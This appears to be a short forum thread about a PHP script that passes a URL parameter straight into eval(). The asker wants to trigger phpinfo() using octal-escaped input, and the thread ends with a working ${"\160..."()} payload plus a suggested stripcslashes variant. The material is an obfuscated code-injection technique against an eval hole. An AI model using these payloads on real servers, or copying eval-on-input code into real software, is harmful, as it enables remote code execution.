I have a code
<?php
eval('print '.$_GET['email'].";");
?>
when I do
http://localhost/1.php?email=phpinfo()
I get executed phpinfo() function
But if I do
http://localhost/1.php?email="\160\150\160\151\156\146\157\050\051"
I get only string "phpinfo()"
So how to execute phpinfo() function using only octals?
try this one
http://localhost/1.php?email=\160\150\160\151\156\146\157\050\051
<?php
$url=urldecode($_GET['email']);
$func_name=stripcslashes($url);
eval('print '.$func_name.";");
?>
Ok im done by myself
http://localhost/1.php?email=${"\160\150\160\151\156\146\157"()}
do the trick